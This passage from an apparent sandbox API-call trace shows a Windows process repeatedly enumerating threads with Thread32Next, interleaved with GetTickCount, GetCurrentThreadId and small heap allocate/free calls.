dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.340] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.341] GetTickCount () returned 0x113d9fb [0203.341] GetCurrentThreadId () returned 0x600 [0203.341] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.341] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.342] GetTickCount () returned 0x113d9fb [0203.342] GetCurrentThreadId () returned 0x600 [0203.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.342] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.342] GetTickCount () returned 0x113d9fb [0203.342] GetCurrentThreadId () returned 0x600 [0203.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.343] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.345] GetTickCount () returned 0x113d9fb [0203.345] GetCurrentThreadId () returned 0x600 [0203.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.346] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.346] GetTickCount () returned 0x113d9fb [0203.346] GetCurrentThreadId () returned 0x600 [0203.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.346] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.347] GetTickCount () returned 0x113d9fb [0203.347] GetCurrentThreadId () returned 0x600 [0203.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.347] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.348] GetTickCount () returned 0x113d9fb [0203.348] GetCurrentThreadId () returned 0x600 [0203.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.348] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.348] GetTickCount () returned 0x113da0a [0203.349] GetCurrentThreadId () returned 0x600 [0203.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.349] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.349] GetTickCount () returned 0x113da0a [0203.349] GetCurrentThreadId () returned 0x600 [0203.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.349] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.350] GetTickCount () returned 0x113da0a [0203.350] GetCurrentThreadId () returned 0x600 [0203.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.350] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.351] GetTickCount () returned 0x113da0a [0203.351] GetCurrentThreadId () returned 0x600 [0203.351] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.351] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.351] GetTickCount () returned 0x113da0a [0203.351] GetCurrentThreadId () returned 0x600 [0203.351] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.352] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.352] GetTickCount () returned 0x113da0a [0203.352] GetCurrentThreadId () returned 0x600 [0203.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.352] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.353] GetTickCount () returned 0x113da0a [0203.353] GetCurrentThreadId () returned 0x600 [0203.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.353] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.354] GetTickCount () returned 0x113da0a [0203.354] GetCurrentThreadId () returned 0x600 [0203.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.354] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.354] GetTickCount () returned 0x113da0a [0203.354] GetCurrentThreadId () returned 0x600 [0203.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.354] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.355] GetTickCount () returned 0x113da0a [0203.355] GetCurrentThreadId () returned 0x600 [0203.355] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.355] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.356] GetTickCount () returned 0x113da0a [0203.356] GetCurrentThreadId () returned 0x600 [0203.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.356] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.357] GetTickCount () returned 0x113da0a [0203.357] GetCurrentThreadId () returned 0x600 [0203.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.357] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.357] GetTickCount () returned 0x113da0a [0203.357] GetCurrentThreadId () returned 0x600 [0203.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.357] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.357] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.358] GetTickCount () returned 0x113da0a [0203.358] GetCurrentThreadId () returned 0x600 [0203.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.358] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.358] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.359] GetTickCount () returned 0x113da0a [0203.359] GetCurrentThreadId () returned 0x600 [0203.359] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.359] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.359] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.359] GetTickCount () returned 0x113da0a [0203.359] GetCurrentThreadId () returned 0x600 [0203.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.360] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.360] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.360] GetTickCount () returned 0x113da0a [0203.360] GetCurrentThreadId () returned 0x600 [0203.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.360] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.360] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.361] GetTickCount () returned 0x113da0a [0203.361] GetCurrentThreadId () returned 0x600 [0203.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.361] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.361] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.362] GetTickCount () returned 0x113da0a [0203.362] GetCurrentThreadId () returned 0x600 [0203.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.362] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.362] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.362] GetTickCount () returned 0x113da0a [0203.362] GetCurrentThreadId () returned 0x600 [0203.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.362] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.363] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.363] GetTickCount () returned 0x113da0a [0203.363] GetCurrentThreadId () returned 0x600 [0203.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.363] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.364] GetTickCount () returned 0x113da0a [0203.364] GetCurrentThreadId () returned 0x600 [0203.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.364] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.365] GetTickCount () returned 0x113da1a [0203.365] GetCurrentThreadId () returned 0x600 [0203.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.365] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.365] GetTickCount () returned 0x113da1a [0203.365] GetCurrentThreadId () returned 0x600 [0203.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.366] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.366] GetTickCount () returned 0x113da1a [0203.366] GetCurrentThreadId () returned 0x600 [0203.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.366] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.367] GetTickCount () returned 0x113da1a [0203.367] GetCurrentThreadId () returned 0x600 [0203.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.367] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.368] GetTickCount () returned 0x113da1a [0203.368] GetCurrentThreadId () returned 0x600 [0203.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.368] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.368] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.368] GetTickCount () returned 0x113da1a [0203.368] GetCurrentThreadId () returned 0x600 [0203.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.368] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.368] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.369] GetTickCount () returned 0x113da1a [0203.369] GetCurrentThreadId () returned 0x600 [0203.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.369] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.370] GetTickCount () returned 0x113da1a [0203.370] GetCurrentThreadId () returned 0x600 [0203.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.370] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.371] GetTickCount () returned 0x113da1a [0203.371] GetCurrentThreadId () returned 0x600 [0203.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.371] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.371] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.371] GetTickCount () returned 0x113da1a [0203.371] GetCurrentThreadId () returned 0x600 [0203.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.371] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.371] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.372] GetTickCount () returned 0x113da1a [0203.372] GetCurrentThreadId () returned 0x600 [0203.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.372] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.373] GetTickCount () returned 0x113da1a [0203.373] GetCurrentThreadId () returned 0x600 [0203.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.373] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.374] GetTickCount () returned 0x113da1a [0203.374] GetCurrentThreadId () returned 0x600 [0203.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.374] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.374] GetTickCount () returned 0x113da1a [0203.374] GetCurrentThreadId () returned 0x600 [0203.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.374] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.375] GetTickCount () returned 0x113da1a [0203.375] GetCurrentThreadId () returned 0x600 [0203.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.375] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.376] GetTickCount () returned 0x113da1a [0203.376] GetCurrentThreadId () returned 0x600 [0203.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.376] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.376] GetTickCount () returned 0x113da1a [0203.376] GetCurrentThreadId () returned 0x600 [0203.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.377] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.377] GetTickCount () returned 0x113da1a [0203.377] GetCurrentThreadId () returned 0x600 [0203.377] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.377] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.378] GetTickCount () returned 0x113da1a [0203.378] GetCurrentThreadId () returned 0x600 [0203.378] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.378] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.379] GetTickCount () returned 0x113da1a [0203.379] GetCurrentThreadId () returned 0x600 [0203.379] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.379] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.379] GetTickCount () returned 0x113da1a [0203.379] GetCurrentThreadId () returned 0x600 [0203.379] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.379] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.381] GetTickCount () returned 0x113da2a [0203.381] GetCurrentThreadId () returned 0x600 [0203.381] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.381] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.382] GetTickCount () returned 0x113da2a [0203.382] GetCurrentThreadId () returned 0x600 [0203.382] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.382] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.382] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.382] GetTickCount () returned 0x113da2a [0203.382] GetCurrentThreadId () returned 0x600 [0203.382] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.382] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.382] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.383] GetTickCount () returned 0x113da2a [0203.383] GetCurrentThreadId () returned 0x600 [0203.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.383] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.384] GetTickCount () returned 0x113da2a [0203.384] GetCurrentThreadId () returned 0x600 [0203.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.384] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.384] GetTickCount () returned 0x113da2a [0203.384] GetCurrentThreadId () returned 0x600 [0203.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.385] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.385] GetTickCount () returned 0x113da2a [0203.385] GetCurrentThreadId () returned 0x600 [0203.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.385] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.386] GetTickCount () returned 0x113da2a [0203.386] GetCurrentThreadId () returned 0x600 [0203.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.386] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.387] GetTickCount () returned 0x113da2a [0203.387] GetCurrentThreadId () returned 0x600 [0203.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.387] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.387] GetTickCount () returned 0x113da2a [0203.387] GetCurrentThreadId () returned 0x600 [0203.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.388] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.388] GetTickCount () returned 0x113da2a [0203.388] GetCurrentThreadId () returned 0x600 [0203.388] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.388] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.389] GetTickCount () returned 0x113da2a [0203.389] GetCurrentThreadId () returned 0x600 [0203.389] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.389] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.390] GetTickCount () returned 0x113da2a [0203.390] GetCurrentThreadId () returned 0x600 [0203.390] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.390] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.390] GetTickCount () returned 0x113da2a [0203.390] GetCurrentThreadId () returned 0x600 [0203.390] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.390] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.391] GetTickCount () returned 0x113da2a [0203.391] GetCurrentThreadId () returned 0x600 [0203.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.391] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.391] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.392] GetTickCount () returned 0x113da2a [0203.392] GetCurrentThreadId () returned 0x600 [0203.392] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.392] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.393] GetTickCount () returned 0x113da2a [0203.393] GetCurrentThreadId () returned 0x600 [0203.393] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.393] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.393] GetTickCount () returned 0x113da2a [0203.393] GetCurrentThreadId () returned 0x600 [0203.393] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.393] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.394] GetTickCount () returned 0x113da2a [0203.394] GetCurrentThreadId () returned 0x600 [0203.394] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.394] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.395] GetTickCount () returned 0x113da2a [0203.395] GetCurrentThreadId () returned 0x600 [0203.395] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.395] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.395] GetTickCount () returned 0x113da39 [0203.396] GetCurrentThreadId () returned 0x600 [0203.396] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.396] Thread32Next (hSnapshot=0x64c, lpte=0x39cf434) returned 1 [0203.396] GetTickCount () returned 0x113da39 [0203.396] GetCurrentThreadId () returned 0x600 [0203.396] RtlAllocateHeap 